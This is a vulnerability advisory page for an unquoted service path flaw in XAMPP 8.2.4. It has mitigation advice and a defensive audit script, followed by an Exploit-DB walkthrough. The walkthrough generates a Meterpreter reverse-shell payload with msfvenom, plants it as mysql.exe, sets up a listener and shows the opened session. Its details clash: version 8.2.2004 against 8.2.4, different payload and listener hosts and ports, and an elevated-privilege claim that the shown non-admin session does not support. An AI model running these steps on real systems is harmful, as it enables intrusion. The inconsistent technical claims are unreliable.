Vendor: XAMPP
Author: Andrey Stoykov
CVSS: 6.7 (MEDIUM)
CWE: 428 (Unquoted Path)
Product Name: XAMPP
Affected Version From: 8.2.2004
Affected Version To: 8.2.2004
Patch Exists: NO
Related CWE:
CPE: a:xampp:xampp:8.2.4
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2022
2023

XAMPP 8.2.4 – Unquoted Path

XAMPP 8.2.4 is affected by an unquoted service path weakness. Because the service's executable path is not enclosed in quotes, a local attacker who can write to the affected directory can replace a legitimate executable with a malicious one; the planted file is then run with elevated privileges, giving the attacker arbitrary code execution.

Mitigation:

Install the latest XAMPP release and make sure every service image path (the executable path together with its arguments) is properly quoted. In addition, audit service paths regularly so that any unquoted entries are identified and remediated.
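The audit recommended above, as an added Python example that is not part of the advisory or of XAMPP: it classifies service image paths the way the wmic one-liner in the raw data below does (any path not wrapped in quotes is reported) and additionally separates plain unquoted paths from unquoted paths that contain spaces, which is where Windows' executable-search ambiguity (CWE-428) actually arises. The service entries are constructed; the first is copied from the advisory's wmic output, the other two are invented for contrast.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of service ImagePath values (what `wmic service get pathname`
# prints, or HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath). The first
# is the XAMPP entry from the advisory; the others are invented for contrast.
SAMPLE_SERVICES = {
    "mysql": r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql",
    "ExampleSvc": r"C:\Program Files\Example App\svc.exe -k netsvcs",
    "QuotedSvc": r'"C:\Program Files\Quoted App\svc.exe" -run',
}

@dataclass
class Finding:
    service: str
    image_path: str
    unquoted: bool               # path not wrapped in quotes
    ambiguous: bool              # unquoted AND a space before ".exe" (CWE-428)
    probe_paths: list = field(default_factory=list)  # prefixes Windows tries first

def executable_portion(image_path: str) -> str:
    """Text up to and including the first '.exe'; whatever follows is arguments."""
    m = re.search(r"\.exe", image_path, flags=re.IGNORECASE)
    return image_path[: m.end()] if m else image_path

def analyze_image_path(service: str, image_path: str) -> Finding:
    path = image_path.strip()
    if path.startswith('"'):
        return Finding(service, image_path, False, False)
    exe = executable_portion(path)
    if " " not in exe:
        return Finding(service, image_path, True, False)
    # CreateProcess tries "<prefix>.exe" at every space before reaching the real
    # binary; each of those locations needs its write ACL checked.
    probes, prefix = [], ""
    for token in exe.split(" ")[:-1]:
        prefix = f"{prefix} {token}" if prefix else token
        probes.append(prefix + ".exe")
    return Finding(service, image_path, True, True, probes)

def audit(services: dict) -> list:
    """Unquoted-path findings for all services, ambiguous ones first."""
    found = [analyze_image_path(n, p) for n, p in services.items()]
    return sorted((f for f in found if f.unquoted), key=lambda f: not f.ambiguous)

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f"{f.service:12} {'AMBIGUOUS' if f.ambiguous else 'unquoted':10} {f.image_path}")
        for p in f.probe_paths:
            print(f"{'':12} check write ACL on: {p}")
```

Note that the advisory's XAMPP entry is reported as unquoted but not ambiguous, since its executable path contains no spaces; the write permissions on the directory itself are what matter for that entry.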

Exploit-DB raw data:

# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/


Steps to Exploit:

1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell


C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

mysql                                                                               mysql                                     C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql            Auto



// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe 


// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.13:4443 
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700


meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 80B5-B405

 Directory of C:\xampp\mysql\bin
[...]